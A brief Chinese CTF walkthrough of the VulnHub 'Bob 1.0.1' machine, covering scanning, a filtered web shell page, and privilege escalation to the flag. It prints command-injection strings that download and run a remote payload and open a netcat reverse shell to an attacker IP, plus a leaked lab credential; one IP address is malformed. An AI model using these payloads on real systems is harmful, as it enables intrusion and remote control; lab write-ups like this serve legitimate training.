https://www.vulnhub.com/entry/bob-101,226/
1.使用Nmap和nikto,发现有两个端口和服务:
80 apache2
25468 ssh
2.思路有两个:
(1)对ssh使用爆破,一般没有获得名户名之前爆破难度很大。
(2)对web服务,进行继续发掘。希望找到可以用的文件。
使用msfconsole和dirb,对网站目录进行扫描。
目录中有robots.txt,发现有可使用的信息。
发现一个dev_shell网页,经过测试对一命令进行了屏蔽,不过whoami && ls -al
是可以使用的,有两个思路:(1)使用如下命令
whoami && cd /tmp;wget http://192.168.1110.11:8080/shell;chmod +x shell;./shell
(2)查找是否存在nc。
whoami&&whereis nc
使用命令:
whoami&&nc 192.168.110.11 4445 -e /bin/sh
主机上:nc -vvlp 4445
得到一个shell,使用
python -c "import pty;pty.spawn('/bin/sh')";
$cd /tmp
$ wget http://192.168.1110.11:8080/shell
$ chmod +x shell
$ ./shell
msfconsole得到一个shell,
继续提权,
很遗憾,提权是失败的,那就是对网站目录进一步发掘。发现有几个用户,在/home/bob目录下发现一个目录:Secret 和文件login.txt.gpg,继续发现一下内容:
同时:找一个用户和密码:
elliot:theadminisdumb
使用这个通过ssh登录系统,尝试在这个文件下解密,得到一个密码:
使用bob账户登录,使用sudo --list
发现一下内容,得到sudo cat flag.txt
领取专属 10元无门槛券
私享最新 技术干货